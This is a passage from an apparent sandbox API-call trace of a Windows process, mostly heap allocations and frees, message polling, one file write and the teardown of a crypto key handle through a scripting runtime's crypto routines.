lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.704] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.704] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0259.705] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.705] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.705] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f20868 [0259.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f28df8 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20868 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f20868 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28df8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f28df8 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20868 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1c5a0 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f182d8 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24b30 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x3bf08b0 [0259.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28df8 | out: hHeap=0x970000) returned 1 [0259.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f14010 [0259.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.715] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x42c0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x42c0, lpOverlapped=0x0) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0259.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.717] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.717] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0259.717] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.718] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0259.719] CryptDestroyKey (hKey=0xa87110) returned 1 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.719] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.720] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.720] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.720] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.720] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.721] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 